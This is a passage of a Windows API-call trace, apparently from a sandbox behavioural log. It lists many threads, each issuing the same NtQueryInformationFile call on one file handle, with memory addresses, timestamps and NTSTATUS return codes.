IoStatusBlock=0x373fb48, FileInformation=0x210e20) returned 0x0 Thread: id = 1393 os_tid = 0x704 [0164.533] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fb20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fb20, FileInformation=0x210e20) returned 0x0 Thread: id = 1394 os_tid = 0x568 [0164.536] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe00, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1395 os_tid = 0x5ac [0164.537] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa20, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1396 os_tid = 0x908 [0164.539] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df9f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df9f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1397 os_tid = 0x888 [0164.542] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f978, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f978, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1398 os_tid = 0x544 [0164.544] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f8d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f8d8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1399 os_tid = 0x76c [0164.546] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf808, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf808, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1400 os_tid = 0xa9c [0164.551] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df810, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df810, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1401 os_tid = 0x114 [0164.553] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb30, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1402 os_tid = 0x5b8 [0164.555] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc78, FileInformation=0x210e20) returned 0x0 Thread: id = 1403 os_tid = 0x814 [0164.557] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361faa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361faa0, FileInformation=0x210e20) returned 0x0 Thread: id = 1404 os_tid = 0x834 [0164.560] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fec0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fec0, FileInformation=0x210e20) returned 0x0 Thread: id = 1405 os_tid = 0x884 [0164.562] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc30, FileInformation=0x210e20) returned 0x0 Thread: id = 1406 os_tid = 0x5d4 [0164.564] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf880, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf880, FileInformation=0x210e20) returned 0x0 Thread: id = 1407 os_tid = 0x340 [0164.566] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf830, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf830, FileInformation=0x210e20) returned 0x0 Thread: id = 1408 os_tid = 0x810 [0164.568] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f958, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1409 os_tid = 0x830 [0164.570] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb68, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1410 os_tid = 0x880 [0164.572] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df9e0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1411 os_tid = 0xae4 [0164.574] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f870, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f870, FileInformation=0x210e20) returned 0x0 Thread: id = 1412 os_tid = 0x570 [0164.576] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe18, FileInformation=0x210e20) returned 0x0 Thread: id = 1413 os_tid = 0xb40 [0164.578] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfec0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfec0, FileInformation=0x210e20) returned 0x0 Thread: id = 1414 os_tid = 0x5f4 [0164.580] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fde0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fde0, FileInformation=0x210e20) returned 0x0 Thread: id = 1415 os_tid = 0xbb8 [0164.582] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fae8, FileInformation=0x210e20) returned 0x0 Thread: id = 1416 os_tid = 0x598 [0164.584] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe08, FileInformation=0x210e20) returned 0x0 Thread: id = 1417 os_tid = 0x4e4 [0164.586] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd68, FileInformation=0x210e20) returned 0x0 Thread: id = 1418 os_tid = 0xbfc [0164.588] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffa70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffa70, FileInformation=0x210e20) returned 0x0 Thread: id = 1419 os_tid = 0x80c [0164.598] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc50, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1420 os_tid = 0xbf8 [0164.600] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fad8, FileInformation=0x210e20) returned 0x0 Thread: id = 1421 os_tid = 0x524 [0164.602] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df7a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1422 os_tid = 0x674 [0164.604] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe08, FileInformation=0x210e20) returned 0x0 Thread: id = 1423 os_tid = 0x4a0 [0164.606] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd18, FileInformation=0x210e20) returned 0x0 Thread: id = 1424 os_tid = 0x5d8 [0164.608] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff9c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1425 os_tid = 0x69c [0164.609] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc28, FileInformation=0x210e20) returned 0x0 Thread: id = 1426 os_tid = 0x6a8 [0164.611] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f848, FileInformation=0x210e20) returned 0x0 Thread: id = 1427 os_tid = 0x500 [0164.613] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1428 os_tid = 0x4e0 [0164.620] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfa78, FileInformation=0x210e20) returned 0x0 Thread: id = 1429 os_tid = 0x330 [0164.622] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff7f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff7f0, FileInformation=0x210e20) returned 0x0 Thread: id = 1430 os_tid = 0xa30 [0164.624] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df968, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df968, FileInformation=0x210e20) returned 0x0 Thread: id = 1431 os_tid = 0xb50 [0164.626] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fac8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fac8, FileInformation=0x210e20) returned 0x0 Thread: id = 1432 os_tid = 0xb70 [0164.628] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1433 os_tid = 0xb6c [0164.630] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffc58, FileInformation=0x210e20) returned 0x0 Thread: id = 1434 os_tid = 0xb74 [0164.632] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb18, FileInformation=0x210e20) returned 0x0 Thread: id = 1435 os_tid = 0xb68 [0164.634] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fef8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fef8, FileInformation=0x210e20) returned 0x0 Thread: id = 1436 os_tid = 0x758 [0164.653] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f9b0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f9b0, FileInformation=0x210e20) returned 0x0 Thread: id = 1437 os_tid = 0x3d4 [0164.656] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fab0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fab0, FileInformation=0x210e20) returned 0x0 Thread: id = 1438 os_tid = 0x484 [0164.658] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1439 os_tid = 0xb4c [0164.660] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd78, FileInformation=0x210e20) returned 0x0 Thread: id = 1440 os_tid = 0xa1c [0164.662] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f9b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f9b8, FileInformation=0x210e20) returned 0x0 Thread: id = 1441 os_tid = 0x2ac [0164.664] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 1442 os_tid = 0xa8c [0164.667] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1443 os_tid = 0x68c [0164.669] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff70, FileInformation=0x210e20) returned 0x0 Thread: id = 1444 os_tid = 0x388 [0164.670] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc10, FileInformation=0x210e20) returned 0x0 Thread: id = 1445 os_tid = 0xa50 [0164.673] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dff80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dff80, FileInformation=0x210e20) returned 0x0 Thread: id = 1446 os_tid = 0x75c [0164.675] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f920, FileInformation=0x210e20) returned 0x0 Thread: id = 1447 os_tid = 0x240 [0164.677] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9b8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9b8, FileInformation=0x210e20) returned 0x0 Thread: id = 1448 os_tid = 0x320 [0164.679] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fad8, FileInformation=0x210e20) returned 0x0 Thread: id = 1449 os_tid = 0x3b4 [0164.681] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f908, FileInformation=0x210e20) returned 0x0 Thread: id = 1450 os_tid = 0x760 [0164.683] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe98, FileInformation=0x210e20) returned 0x0 Thread: id = 1451 os_tid = 0xb00 [0164.685] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fae8, FileInformation=0x210e20) returned 0x0 Thread: id = 1452 os_tid = 0x7fc [0164.687] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffe58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffe58, FileInformation=0x210e20) returned 0x0 Thread: id = 1453 os_tid = 0xb18 [0164.689] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357ff30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357ff30, FileInformation=0x210e20) returned 0x0 Thread: id = 1454 os_tid = 0xa68 [0164.691] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb18, FileInformation=0x210e20) returned 0x0 Thread: id = 1455 os_tid = 0x224 [0164.693] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f848, FileInformation=0x210e20) returned 0x0 Thread: id = 1456 os_tid = 0x2c4 [0164.695] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ff790, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ff790, FileInformation=0x210e20) returned 0x0 Thread: id = 1457 os_tid = 0x24c [0164.700] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfea0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfea0, FileInformation=0x210e20) returned 0x0 Thread: id = 1458 os_tid = 0x4e8 [0164.702] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe38, FileInformation=0x210e20) returned 0x0 Thread: id = 1459 os_tid = 0x220 [0164.704] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f848, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f848, FileInformation=0x210e20) returned 0x0 Thread: id = 1460 os_tid = 0xb04 [0164.710] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9c8, FileInformation=0x210e20) returned 0x0 Thread: id = 1461 os_tid = 0x180 [0164.712] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa48, FileInformation=0x210e20) returned 0x0 Thread: id = 1462 os_tid = 0x53c [0164.714] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fa18, FileInformation=0x210e20) returned 0x0 Thread: id = 1463 os_tid = 0x5b4 [0164.716] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc48, FileInformation=0x210e20) returned 0x0 Thread: id = 1464 os_tid = 0x614 [0164.718] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f7e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f7e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1465 os_tid = 0x690 [0164.720] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff940, FileInformation=0x210e20) returned 0x0 Thread: id = 1466 os_tid = 0x440 [0164.722] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363faf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363faf0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1467 os_tid = 0x7d8 [0164.723] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffda8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffda8, FileInformation=0x210e20) returned 0x0 Thread: id = 1468 os_tid = 0xa60 [0164.726] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd30, FileInformation=0x210e20) returned 0x0 Thread: id = 1469 os_tid = 0xb24 [0164.728] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffdc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffdc8, FileInformation=0x210e20) returned 0x0 Thread: id = 1470 os_tid = 0x878 [0164.730] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369faa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369faa0, FileInformation=0x210e20) returned 0x0 Thread: id = 1471 os_tid = 0xb1c [0164.732] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f928, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f928, FileInformation=0x210e20) returned 0x0 Thread: id = 1472 os_tid = 0xb08 [0164.734] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa80, FileInformation=0x210e20) returned 0x0 Thread: id = 1473 os_tid = 0x4fc [0164.735] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f918, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f918, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1474 os_tid = 0x4dc [0164.737] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fba0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fba0, FileInformation=0x210e20) returned 0x0 Thread: id = 1475 os_tid = 0x43c [0164.740] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfaa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfaa0, FileInformation=0x210e20) returned 0x0 Thread: id = 1476 os_tid = 0x1c4 [0164.742] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb68, FileInformation=0x210e20) returned 0x0 Thread: id = 1477 os_tid = 0xbec [0164.744] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1478 os_tid = 0xb48 [0164.746] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffca0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffca0, FileInformation=0x210e20) returned 0x0 Thread: id = 1479 os_tid = 0x5bc [0164.748] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe38, FileInformation=0x210e20) returned 0x0 Thread: id = 1480 os_tid = 0x6b8 [0164.750] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc18, FileInformation=0x210e20) returned 0x0 Thread: id = 1481 os_tid = 0x2dc [0164.752] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f980, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f980, FileInformation=0x210e20) returned 0x0 Thread: id = 1482 os_tid = 0x158 [0164.754] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f940, FileInformation=0x210e20) returned 0x0 Thread: id = 1483 os_tid = 0x6cc [0164.756] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fb88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fb88, FileInformation=0x210e20) returned 0x0 Thread: id = 1484 os_tid = 0x694 [0164.757] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfed0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfed0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1485 os_tid = 0x6d8 [0164.759] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfa70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfa70, FileInformation=0x210e20) returned 0x0 Thread: id = 1486 os_tid = 0x87c [0164.761] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd48, FileInformation=0x210e20) returned 0x0 Thread: id = 1487 os_tid = 0xb88 [0164.763] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fad0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fad0, FileInformation=0x210e20) returned 0x0 Thread: id = 1488 os_tid = 0xb8c [0164.765] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fdd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fdd8, FileInformation=0x210e20) returned 0x0 Thread: id = 1489 os_tid = 0x700 [0164.767] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f9c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f9c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1490 os_tid = 0x6f0 [0164.769] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1491 os_tid = 0x130 [0164.772] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df998, FileInformation=0x210e20) returned 0x0 Thread: id = 1492 os_tid = 0x754 [0164.774] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff50, FileInformation=0x210e20) returned 0x0 Thread: id = 1493 os_tid = 0x72c [0164.776] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fcb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fcb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1494 os_tid = 0x748 [0164.777] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe48, FileInformation=0x210e20) returned 0x0 Thread: id = 1495 os_tid = 0x928 [0164.779] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df8f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df8f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1496 os_tid = 0xcc [0164.781] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9a8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1497 os_tid = 0xd0 [0164.783] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa30, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa30, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1498 os_tid = 0xd4 [0164.785] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f9a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f9a8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1499 os_tid = 0xd8 [0164.787] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36fff40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36fff40, FileInformation=0x210e20) returned 0x0 Thread: id = 1500 os_tid = 0xdc [0164.789] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1501 os_tid = 0xe0 [0164.797] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f948, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 1502 os_tid = 0xe4 [0164.799] NtQueryInformationFile 